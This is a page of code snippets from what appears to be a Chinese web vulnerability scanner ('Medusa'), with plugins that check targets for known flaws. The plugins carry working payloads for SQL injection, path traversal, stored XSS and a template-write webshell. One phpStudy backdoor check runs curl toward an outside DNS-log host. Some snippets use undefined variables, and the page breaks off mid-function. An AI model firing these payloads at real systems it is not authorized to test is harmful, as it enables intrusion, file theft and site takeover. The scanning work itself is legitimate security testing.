Exemplo n.º 1
0
def medusa(Url,RandomAgent,UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    urls = [
        "/Rat/ebid/viewInvite3.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite4.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite5.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite6.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite2.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite1.asp?InviteId=0000002852",
        "/Rat/EBid/ViewClarify1.asp?InviteId=11",
        "/Rat/EBid/ViewClarify.asp?InviteId=11",
        "/Rat/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11",
    ]
    data = "%27%20and%20(CHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(88)%2BCHAR(81)%2BCHAR(49)%2BCHAR(55))%3E0--"
    for payload in urls:
        try:
            payload_url = scheme + "://" + url +":"+ str(port)+payload+data


            headers = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }

            s = requests.session()
            resp = s.get(payload_url,headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if con.lower().find("testXQ17") != -1:
                Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format(url,con,payload_url)
                _t=VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
                ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 2
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    payloads = [
        '..././http/..././config/config_db.php',
        '.....///http/.....///config/config_db.php',
        'http\..\..\config\config_db.php',
    ]
    for payload in payloads:
        try:
            payload_url = scheme + "://" + url + ":" + str(
                port) + '/include/thumb.php?dir=' + payload
            headers = {
                'User-Agent':
                RandomAgent,
                'Content-Type':
                'application/x-www-form-urlencoded',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }

            s = requests.session()
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and con.find('con_db_host') != -1 and con.find(
                    '<?php') != -1 and con.find(
                        'con_db_por') != -1 and con.find('con_db_id') != -1:
                Medusa = "{}存在Metinfo任意文件读取漏洞\r\n 漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, _)
            _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 3
0
def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/user/do.php?ac=edit@op=zl"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        referer = scheme + "://" + url
        headers = {
            "User-Agent": RandomAgent,
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer":
            "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie":
            "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "169"
        }
        data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/'xss'/)>"
        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        if con.find('PHP Version') != -1 and con.find('System'):
            Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 4
0
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payloads = ["/vpn/../vpns/services.html", "/vpn/../vpns/cfg/smb.conf"]

        for payload in payloads:
            payload_url = scheme + '://' + url + ':' + str(port) + payload
            headers = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
            }

            s = requests.session()
            resp = s.get(payload_url,
                         headers=headers,
                         timeout=6,
                         proxies=proxies,
                         verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and con.find("encrypt password") != -1:
                Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 5
0
def Main(Url, FileName, Values, ProxyIp):
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的)
    ua = ClassCongregation.UserAgentS(Values)  #传入用户输入用户指定的浏览器头
    RandomAgent = ua.UserAgent()  #获取生成的头文件
    try:
        Medusa = Cms.Wordpress.Wordpress_admin_ajax_filedownload.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass

    try:
        Medusa = Cms.Wordpress.Wordpress_display_widgets_backdoor.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass

    try:
        Medusa = Cms.Wordpress.Wordpress_plugin_azonpop_sqli.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
    try:
        Medusa = Cms.Wordpress.Wordpress_plugin_mailpress_rce.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass

    try:
        Medusa = Cms.Wordpress.Wordpress_plugin_ShortCode_lfi.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass

    try:
        Medusa = Cms.Wordpress.Wordpress_woocommerce_code_exec.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
Exemplo n.º 6
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/bugfree/Login.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        data = {
            'xajax': 'xSelectLanguage',
            'xajaxargs[]': '../../5555.txt%00',
            'xajaxr': '1377604187765'
        }
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.post(payload_url,
                      headers=headers,
                      data=data,
                      timeout=6,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if con.find("System") != -1 and con.find("Build Date") != -1:
            Medusa = "{}存在BugFree文件包含漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 7
0
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(
            RD)
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.post(payload_url,
                             data=data,
                             headers=headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find(RD) != -1:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 8
0
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            "Content-Type": "application/x-www-form-urlencoded",
            'User-Agent': RandomAgent,
        }
        s = requests.session()
        resp = s.post(payload_url,
                      data=post_data,
                      headers=headers,
                      proxies=proxies,
                      timeout=5,
                      verify=False)
        resp2 = s.get(payload_url,
                      headers=headers,
                      timeout=5,
                      proxies=proxies,
                      verify=False)
        con = resp.text
        con2 = resp2.text
        if con2.lower().find('navigation.php') != -1 and con.lower().find(
                'frame_navigation') != -1:
            Medusa = "{}存在phpstudy_phpmyadmin默认密码漏洞 \r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(
                url, payload_url, post_data)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 9
0
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/k/cms/cmsmadesimple/install/index.php"
        data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.post(payload_url,
                             data=data,
                             headers=headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find(
                '''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>'''
        ) != -1:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 10
0
def medusa(Url, RandomAgent, ProxyIp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/search.php?phpinfo()"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': scheme + '://' + url,
            'Referer': payload
        }

        s = requests.session()
        resp = s.post(payload_url,
                      headers=headers,
                      data=payload_data,
                      timeout=5,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('System') != -1 and con.find(
                'Compiler'
        ) != -1 and con.find('Build Date') != -1 and con.find(
                'IPv6 Support') != -1 and con.find('Configure Command') != -1:
            Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, con.encode(encoding='utf-8'))
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # 写入文件,url为目标文件名统一传入,Medusa为结果
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 11
0
def medusa(Url, RandomAgent, Token, proxies=None):
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    DL = ClassCongregation.Dnslog()
    commandS = ('''system("curl http://{}");''').format(DL.dns_host())
    cmd = base64.b64encode(commandS.encode('utf-8'))
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': cmd,
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        s = requests.session()
        resp = s.get(payload_url,
                     headers=headers,
                     timeout=5,
                     proxies=proxies,
                     verify=False)
        if DL.result():
            # if True:
            Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(
                url, payload_url, headers, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 12
0
def medusa(Url, RandomAgent, Token, proxies=None):
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    payload_url = scheme + "://" + url + ':' + str(port) + payload
    host = url + ':' + str(port)
    headers = {
        'Host': host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language':
        'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'DNT': '1',
        'Upgrade-Insecure-Requests': '1'
    }

    try:
        s = requests.session()
        resp = s.get(payload_url,
                     headers=headers,
                     proxies=proxies,
                     timeout=5,
                     allow_redirects=False)
        con = resp.headers['Location']
        code = resp.status_code
        if code == 302 and con.lower().find('54289') != -1:
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:版本低于<=Struts2_3_34,Struts2_5_16\r\nPayload:{}\r\n".format(
                url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 13
0
def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        referer = scheme + "://" + url
        headers = {
            "Host": "{}".format(url),
            "User-Agent": RandomAgent,
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer":
            "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie":
            "S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "169"
        }
        data = "FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5"
        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        if con.find('PHP Version') != -1 and con.find('System'):
            Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 14
0
def medusa(Url, RandomAgent, Token, proxies=None):
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/install/phpinfo.php"

        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url,
                     headers=headers,
                     timeout=6,
                     proxies=proxies,
                     verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('System') != -1 and con.find(
                'Configure Command') != -1 and con.find(
                    'PHP') != -1 and con.find('IPv6 Support') != -1:
            Medusa = "{}存在php探针漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 15
0
def medusa(Url, RandomAgent, Token, proxies=None):
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/index.php/Message/add"
        data = "contacts[content`,`create_time`,`update_time`) VALUES ('1', '1' ,1 and updatexml(1,concat(0x3a,user()),1) );-- a] = 11231231313&mobile=2&content=3"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        resp = requests.post(payload_url,
                             headers=headers,
                             timeout=6,
                             data=data,
                             proxies=proxies,
                             verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('错误信息') != -1 and con.find(
                '''(`content`,`create_time`,`update_time`) VALUES ('1', '1' ,1 and updatexml(1,concat(0x3a,user()),1) )'''
        ) != -1 and con.find('执行SQL发生错误') != -1:
            Medusa = "{} 存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # 写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 16
0
def Main(Url, FileName, Values, ProxyIp):
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的)
    ua = ClassCongregation.UserAgentS(Values)  #传入用户输入用户指定的浏览器头
    RandomAgent = ua.UserAgent()  #获取生成的头文件
    Medusa = [
        JenkinsArbitraryFileReadVulnerability.medusa(Url, RandomAgent,
                                                     ProxyIp),
        JenkinsRemoteCommandExecutionVulnerability.medusa(
            Url, RandomAgent, ProxyIp),
        JenkinsConfigurationErrorCausesUnauthorizedCodeExecutionVulnerability.
        medusa(Url, RandomAgent, ProxyIp)
    ]
    try:
        for i in tqdm(Medusa, ascii=True, desc="Jenkins plugin progress"):
            WriteFile.Write(str(i))
    except:
        pass
Exemplo n.º 17
0
def Main(Url, FileName, Values, ProxyIp):
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的)
    ua = ClassCongregation.UserAgentS(Values)  #传入用户输入用户指定的浏览器头
    RandomAgent = ua.UserAgent()  #获取生成的头文件
    try:
        Medusa = Cms.Umail.Umail_sessionid_access.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
        #print("[-]NginxDirectoryTraversalVulnerability Scan error")
    try:
        Medusa = Cms.Umail.Umail_physical_path.medusa(Url, RandomAgent,
                                                      ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
Exemplo n.º 18
0
def Main(Url, FileName, Values, ProxyIp):
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的)
    ua = ClassCongregation.UserAgentS(Values)  #传入用户输入用户指定的浏览器头
    RandomAgent = ua.UserAgent()  #获取生成的头文件
    try:
        Medusa = Cms.Joomla.Joomla_com_docman_lfi.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
        #print("[-]NginxDirectoryTraversalVulnerability Scan error")
    try:
        Medusa = Cms.Joomla.Joomla_index_list_sqli.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
Exemplo n.º 19
0
def Main(Url, FileName, Values, ProxyIp):
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的)
    ua = ClassCongregation.UserAgentS(Values)  #传入用户输入用户指定的浏览器头
    RandomAgent = ua.UserAgent()  #获取生成的头文件
    try:
        Medusa = Cms.Metinfo.Metinfo_login_check_sqli.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
        #print("[-]NginxDirectoryTraversalVulnerability Scan error")
    try:
        Medusa = Cms.Metinfo.Metinfo_getpassword_sqli.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
Exemplo n.º 20
0
def Main(Url, FileName, Values, ProxyIp):
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的)
